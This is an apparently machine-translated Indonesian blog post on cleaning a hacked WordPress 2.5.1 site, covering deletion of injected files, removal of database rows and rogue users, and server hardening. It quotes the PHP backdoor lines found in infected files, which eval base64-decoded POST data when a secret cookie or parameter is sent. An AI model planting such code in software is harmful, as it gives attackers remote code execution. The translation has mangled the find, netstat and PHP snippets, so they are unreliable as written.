WordPress Exploit - membersihkan file dikompromikan, dan keamanan SQL Server.

Sebelum Anda membaca posting ini, Anda akan melihat , Untuk memahami sesuatu. :)

Kami menemukan banyak blog di file stealthsettings.com, kode yang mirip dengan di bawah, yang timbul dari virusarii dengan WordPress mengeksploitasi.:

? <Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'file'])); exit; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcJika di atas adalah tentang file xmlrpc.php dari sepi, Pada grep Server, sepertinya cukup banyak semacam ini dalam kode sumber.

pppffiuuu

Membersihkan file yang terinfeksi:

Ooookkkk ...
1. Solusi terbaik, seperti yang dilakukan backupDan dibersihkan database adalah untuk menghapus arsip WordPress (Wp-config.php dapat menyimpan file-file tidak ketat terkait dengan platform yang WP, setelah hati-hati diperiksa) pada server dan jangan meng-upload versi asli 2.5.1 (Pada kesempatan ini dan membuat upgrade versi wp :)) http://wordpress.org/download/ . Lap termasuk file tema jika Anda tidak percaya bahwa pemeriksaan hati mereka.

Tampaknya telah dipengaruhi dan file dari tema-tema yang belum pernah digunakan sebelumnya di blog dan hanya mengubah tema, tidak memecahkan masalah.

./andreea/wp-content/themes/default/index.php:<?php if ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' file '])); exit; ??}> <Php get_header (); ?>

2. Cari dan menghapus semua file yang berisi:... Pngg * _new.php, * _old.php, * Jpgg, * Giff, * dan file wp-info.txt, jika ada.

Cari. -Nama "* _new.php"
Cari. -Nama "* _old.php"
Cari. -Nama "*. Jpgg"
Cari. -Nama "* _giff"
Cari. -Nama "* _pngg"
Cari. -Nama "wp-info.txt"

3. di / Tmp , Cari dan menghapus folder seperti tmpYwbzT2

Pembersihan SQL :

1. pada Tabel Tabel wp_options Periksa dan menghapus baris: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Semua dalam wp_options, pergi ke active_plugins dan hapus jika ada sebuah plugin yang berakhir di salah satu ekstensi * _new.php, * _old.php, *. jpgg, *. giff, *. pngg atau jika perpanjangan dicurigai, periksa dengan seksama.

3. Pada Tabel wp_users, Lihat apakah ada pengguna yang tidak menulis apapun di tangan kanan, kolom user_nicename. Hapus pengguna, tetapi perhatikan nomor pada kolom ID. Pengguna ini dapat menggunakan "Wordpress" sebagai user_login dibuat dan muncul di 00: 00: 00 0000-00-00.

4. Pergi ke Tabel wp_usermeta dan menghapus semua baris milik ID di atas.

Setelah Anda melakukan ini dry sql, menonaktifkan dan kemudian mengaktifkan plugin tertentu. (Dalam blog -> Dashboard -> Plugins)

Server yang aman:

1. Lihat apa direktori dan file "ditulis"(Chmod 777) dan mencoba untuk menempatkan mereka chmod yang tidak akan memungkinkan tulisan mereka di tingkat manapun. (Chmod 644, misalnya)

Cari. -Perm-2-ls

2. Melihat file apa memiliki set bit SUID atau SGID . Jika Anda tidak menggunakan file-file menempatkan mereka chmod 0 atau menghapus paket yang berisi. Mereka sangat berbahaya, karena mereka melaksanakan hak "kelompok"Atau"akar"Bukan dengan hak user biasa untuk menjalankan file tersebut.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Periksa apa port yang terbuka dan mencoba untuk menutup atau mengamankan mereka yang tidak digunakan.

netstat-an | grep-i mendengarkan

Begitu banyak. Begitu Google Search dan yang lainnya mengatakan, "Yah mereka lakukan!". Yah baik Anda melakukannya ... tetapi Anda tahu jika Google mulai melarang semua situs pembentukan IS SPAM dan menempatkan Trojans (Trojan.Clicker.HTML) di cookie?

WordPress Exploit - membersihkan file dikompromikan, dan keamanan SQL Server.

Tentang Penulis

Stealth

Bergairah tentang segala sesuatu yang berarti gadget dan TI, saya menulis dengan senang hati stealthsettings.com dari 2006 dan saya suka menemukan dengan Anda hal-hal baru tentang komputer dan sistem operasi macOS, Linux, Windows, iOS dan Android.

Tambahkan Komentar

Tinggalkan Komentar

Situs ini menggunakan Akismet untuk mengurangi spam. Pelajari bagaimana data komentar Anda diproses.